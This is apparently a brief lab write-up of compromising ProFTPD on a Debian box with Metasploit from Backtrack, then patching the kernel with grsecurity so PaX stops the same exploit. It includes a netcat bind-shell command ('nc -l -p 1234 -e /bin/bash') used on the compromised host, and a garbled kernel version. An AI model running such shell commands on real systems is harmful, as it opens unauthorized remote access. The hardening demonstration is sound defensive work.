Attacker: Backtrack 4 rc2 - Metasploit 3.6
set TARGET 2
set PAYLOAD ...
The Shell-payloads of metapsloit didnt work but i could execute a command
--> nc -l -p 1234 -e /bin/bash
which listens on port 1234 and gives you a bash shell on connect
system got compromised. so now with grsecurity
i used the tutorial from http://xorl.wordpress.com/2009/02/02/how-to-grsec-debian-262710-grsec/
to patch the latest kernel in this case
Linux debian 22.214.171.124
at compilation i got an error, something with "lguest"
found a workaround (easy) at
i tried again to exploit proftpd and it didnt work.
pax did alarm me and shutdown proftpd
HERE is the VIDEO